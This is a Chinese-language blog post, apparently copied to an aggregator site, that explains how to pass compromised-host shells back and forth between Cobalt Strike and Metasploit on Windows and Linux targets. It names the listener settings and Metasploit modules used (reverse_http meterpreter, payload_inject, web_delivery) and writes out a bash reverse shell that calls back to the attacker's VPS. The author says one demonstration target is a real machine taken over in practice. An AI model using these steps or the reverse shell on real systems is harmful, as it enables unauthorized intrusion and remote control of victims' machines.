概述
文章目录
- 前言
- 一、Cobalt Strike的shell弹给msf(windows)
- 选对payload
- 二、msf反弹回cs(windows)
- 三、目标Linux系统,cs反弹回msf
- web_delivery模块一条命令上线msf
- 四、目标Linux系统,msf反弹shell给cs
- 总结
前言
实现Cobalt_Strike和Metasploit的联动,让shell在两者之间可以弹来弹去,因为两者的功能区别还是有的,两个工具都各有所长,所以为了更多的功能能够得到利用,两者之间的联动很有必要记录一下。
提示:以下是本篇文章正文内容,下面案例可供参考
一、Cobalt Strike的shell弹给msf(windows)
首先,cs上面要有上线的主机,比如我就搞了一台windows的上线了,因为是mac电脑的原因我懒得弄虚拟机,所以又实战搞了一台来做演示,真的服了……好怀念windows ,只能打码了。
上面是普通权限,下面是提权之后的。
cs上面有了,接下来就是把shell派生到msf,需要提前建立监听器,Payload设置成Foreign HTTP协议,Host就设置成装有msf的vps服务器地址,公网的。下面就是端口。
设置完监听器,msf也要配置一下:
msf上面的payload要和cs上面的类型协议保持一致,用http的。然后是设置监听的主机和端口,也要和cs上面的一致。
点击run开始监听,然后cs点击Spawn模块,派生shell给到msf:
发现报错了:
我仔细看了一下,原来是payload设置错了,应该是下面这个payload才对。
选对payload
windows/meterpreter/reverse_http
设置的步骤和前面的一样。
然后再在cs点击Spawn,选中监听器,msf就成功获得shell了。
将msf的编码设置一下,就不会乱码了
chcp 65001
成功,和cs上面的一致。
二、msf反弹回cs(windows)
上面我们用cs,把shell给到msf,那么接下来就是msf再给到cs。
继续上面的操作,exit退出,再background把shell存到session里:
然后需要用到msf的local/payload_inject模块来进行反弹shell。
这里的lhost和lpost就是cs上面监听器的配置,所以需要提前在cs上创建一个监听器:
在msf上面配置:
完成后直接exploit或者run:
cs立马上线。
三、目标Linux系统,cs反弹回msf
这个我之前有写过,直接贴链接。很详细的说明。
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
通过上面的办法,让一台linux系统的主机先上线到cs后,开始下一步的操作。
下面我是又搞了台Linux的上线cs了:
将这个cs的shell再给到msf,用到的方法很简单,????注意了,Linux的主机可不能再用cs的派生shell模块Spawn,是没办法用到。为了解决这个问题,要从Linux最本质的原理出发,它不是自带反弹shell的base -i么,直接用就完事了。
先在msf上建立监听:
注意payload一定要选对,确定好Linux的系统版本.
然后监听的类型是反向连接的reverse,协议tcp。run或者exploit开始监听,然后在cs输入base -i 反弹shell命令:
bash -i >& /dev/tcp/vpsip/2321 0>&1
发现不行,没有反映,我又试着用pyton的反弹shell命令,也是不行,前者是毫无反应,后者有反应,但是弹不回shell.
命令没错,具体为什么不行,我现在也不知道为什么,有知道的可以说一下。但是解决的办法肯定是有的,条条大路通罗马。
web_delivery模块一条命令上线msf
我思来想去,还得是用到这个模块:
exploit/multi/script/web_delivery模块
直接一条命令上线msf。操作如下:
1、使用exploit/multi/script/web_delivery模块
2、设置target目标,为set targer为Linux
3、设置payload,payload是反向连接的类型reverse,
tcp协议。
4、run或exploit执行
运行后会出现一条命令,直接cs复制粘贴运行即可:
ok大功告成,msf成功接收到了session.
完美!
执行命令也是没毛病:
四、目标Linux系统,msf反弹shell给cs
那么,又到了最后一步,也是这次完整实验的最后一个,目标是Linux的,怎么给到cs。
同样的,也可以用老方法:
Linux被控主机反弹shell给Cobalt_Strike(CS)-详细实战笔记
将Cross2C生成的文件在msf中执行它,cs就可以上线了,但是这个办法有点麻烦,因为要文件上传,搞来搞去的不是很方便。但是我又实在是找不到更容易的办法。
Linux系统还是没有windows的渗透好搞,就是步骤比较麻烦一点,问题不大,如果有什么更好的办法,请大佬们告诉我。
总结
最全的Cobalt Strike和msf之间的联动实验了,我看网上都是东一块西一块,还没见过windows和linux系统合在一起说明的,今天我一次性把双系统,双工具之间的联动讲得明明白白。主要是最近加班多,脑子记忆力不太好,很多东西昨天学今天忘,一下子不做就容易忘记,又来百度找资料就很麻烦,而且很多抄袭甚至不成功的办法也贴出来,处处碰壁,所以干脆自己记一记,下次直接在自己主页搜就方便了。
文章原创,欢迎转载,请注明文章出处: Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell.。百度和各类采集站皆不可信,搜索请谨慎鉴别。技术类文章一般都有时效性,本人习惯不定期对自己的博文进行修正和更新,因此请访问出处以查看本文的最新版本。
最后
以上就是舒适草莓为你收集整理的Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell前言一、Cobalt Strike的shell弹给msf(windows)二、msf反弹回cs(windows)三、目标Linux系统,cs反弹回msf四、目标Linux系统,msf反弹shell给cs总结的全部内容,希望文章能够帮你解决Cobalt_Strike与Metasploit(msf)联动-Win或Linux不同系统之间互相弹shell前言一、Cobalt Strike的shell弹给msf(windows)二、msf反弹回cs(windows)三、目标Linux系统,cs反弹回msf四、目标Linux系统,msf反弹shell给cs总结所遇到的程序开发问题。
如果觉得靠谱客网站的内容还不错,欢迎将靠谱客网站推荐给程序员好友。
发表评论 取消回复